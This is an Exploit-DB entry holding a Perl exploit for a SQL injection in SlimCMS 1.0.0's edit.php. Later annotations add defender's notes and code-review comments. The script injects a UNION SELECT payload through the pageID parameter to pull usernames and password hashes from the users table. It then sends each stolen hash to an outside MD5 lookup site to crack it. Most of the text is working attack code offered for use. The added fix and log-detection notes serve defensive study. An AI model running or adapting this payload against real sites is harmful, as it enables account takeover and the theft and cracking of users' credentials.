SlimCMS 1.0.0 - 'edit.php' SQL Injection

EDB-ID:

7121


Author:

StAkeR

Type:

webapps


Platform:

PHP

Date:

2008-11-14


#!/usr/bin/perl

=starting

 --------------------------------------------------------
 SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit
 --------------------------------------------------------
 by athos - staker[at]hotmail[dot]it
 
 download from SourceForge
 
 
 File edit.php
 
 111. if ($password == md5($_POST['password']))
 112. {
 113.    if (strlen($_POST['cmsText']) > 2) {
 114. $query  = "UPDATE pages SET title = '".$_POST['pageTitle']."', content =  '".
      strip_tags(stripslashes($_POST['cmsText']),$allowedTags)."' WHERE ID = ".$_GET['pageID'];
 115. mysql_query($query);
 116. //$successfulyUpdated
 117. responseText = $successfulyUpdated;
 118. }
 119.
 120. if (strlen($_GET['pageID']) > 0) {
 121. $query  = "SELECT * FROM pages WHERE ID = ".$_GET['pageID'];
 122. $result = mysql_query($query);
 123.
 124.				
 125. while($row = mysql_fetch_array($result)) {
 126.	$pageTitle = $row['title'];
 127.	$pageContent = $row['content'];
 128.  }
 129. }
 
 NOTE: Works regardless of php.ini settings.
 
  
  you must be logged in.
  
  Usage: perl "exploit.pl" [HOST] [username:password] [USER_ID]
  
  Output: Username: athos
          Password: 27e43424d53719a645ae7cca038b45be
 
 

=cut

use strict;
use LWP::UserAgent;
use LWP::Simple;

# Proof-of-concept for the edit.php SQL injection quoted in the header.
# Flow: set pageID to a UNION SELECT against the users table, POST the
# supplied login to edit.php at that URL, scrape "username:hash" out of
# the page title the script echoes back, then hand the hash to search_MD5.
#
# Defender's notes:
#  - edit.php concatenates $_GET['pageID'] unquoted into its SQL (lines 114
#    and 121 of the quoted source), so quoting/escaping settings cannot
#    help; the fix is an integer cast or a prepared statement for pageID.
#  - "union select" inside the pageID query-string parameter is the string
#    to search for in web-server access logs.
#  - Only `use strict` is enabled; `use warnings` would likely have flagged
#    the `=>`-for-`>=` typos noted below.

# Plain string used as a regex against the response body (see below); the
# single capture group is the page title, which here carries the injected
# row. qr{...} would be the idiomatic form for a reused pattern.
my $match = q{Editing page "(.+?)"};
my $http = new LWP::UserAgent;   # indirect-object syntax; LWP::UserAgent->new is the modern form
my $post = undef;   # HTTP::Response from the POST below
my @login = ();     # (username, password) split from the second argument
my @out = ();       # (username, hash) split from the captured title

my ($host,$auth,$myid) = @ARGV;

# Argument check: host must start with http://, and the credential pair and
# the target row id must both be present. $myid is not validated further
# and is interpolated into the payload as-is.
unless($host =~ /http:\/\/(.+?)$/i && $auth && $myid)
{
    print STDOUT "Usage: perl $0 [host/path] [username:password] [id]\r\n"; 
    exit;
} 

# Request URL carrying the injection: the whole pageID value ends up in
# edit.php's SELECT (line 121 of the quoted source). concat(username,0x3a,
# password) yields "username:hash" (0x3a is ':'), which the regex above
# picks out of the title. This is the request a WAF rule would match.
$host .= "/edit.php?pageID=-1 union select 1,concat(username,0x3a,password),3,4 from users where id=$myid#";

# Credentials come as "user:pass"; no split limit, so a password containing
# ':' is truncated at its first colon.
@login = split(':',$auth);

# POST the login form fields to the injected URL.
$post = $http->post($host,[ 
                            username => $login[0],
                            password => $login[1],
                         ]);


# Proceed only on a 2xx response whose body matches; $1 is the title capture.
if($post->is_success && $post->content =~ $match) 
{
    @out = split(':',$1);
   
    # NOTE: `=>` is the fat comma, not `>=`. The condition is the list
    # ($#out, 2) evaluated in scalar context, which yields 2 (true), so this
    # branch is always taken and the else below is unreachable.
    if($#out => 2)
    {
        # Sends the recovered hash to an external lookup service (see
        # search_MD5); the credential material leaves this machine.
        my $cracked = search_MD5($out[1]);
        
        print STDOUT "Username: $out[0]\r\n";
        print STDOUT "Password: $out[1] -> $cracked\r\n";
        exit;  
   }
   else
   {
       print STDOUT "Exploit Failed!\r\n";
       print STDOUT "Login incorrect or site not vulnerable\\available!\r\n";
       exit;
   }
}


# Look a hex MD5 digest up on a public reverse-lookup service and return the
# response body, or terminate the whole process. The hash is transmitted to
# a third party over plain HTTP, unencoded, as part of the query string.
#
# Arguments: $hash - the hex digest scraped from edit.php's page title.
# Returns:   the service's response body; on failure the process exits
#            instead of returning (see below).
sub search_MD5
{
    my $hash = shift @_;
    my $cont = undef;

    # LWP::Simple::get returns the body, or undef on any failure.
    $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);
        
    # NOTE: `=>` is the fat comma, not `>=`. This parses as the list
    # (length($hash), 32 && !is_error($cont)), which in scalar context is
    # just `32 && !is_error($cont)`, so the length test has no effect.
    # NOTE(review): is_error expects an HTTP status code but is handed the
    # body (or undef) here, so it presumably never reports an error --
    # confirm against LWP::Simple.
    if(length($hash) => 32 && !is_error($cont))
    {
        return $cont;
    }
    else
    {
        # exit terminates the process; the enclosing return is never reached.
        return exit;
    }
}   
    
__END__

# milw0rm.com [2008-11-14]